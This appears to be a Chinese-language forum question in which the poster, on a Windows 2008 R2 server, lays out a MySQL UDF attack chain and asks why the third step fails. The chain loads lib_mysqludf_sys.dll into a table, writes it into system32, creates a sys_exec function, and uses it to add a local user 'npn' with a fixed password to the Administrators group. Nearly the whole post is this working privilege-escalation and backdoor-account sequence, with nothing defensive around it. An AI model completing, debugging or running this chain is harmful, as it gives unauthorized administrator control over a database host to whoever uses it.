我有 windows 2008 r2 server pc , 我尝试命令执行mysql查询,如下所示:
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_files('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
问题出现在第3行:
INSERT INTO npn values(load_files('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
C://xampplite//htdocs//mail//lib_mysqludf_sys.dll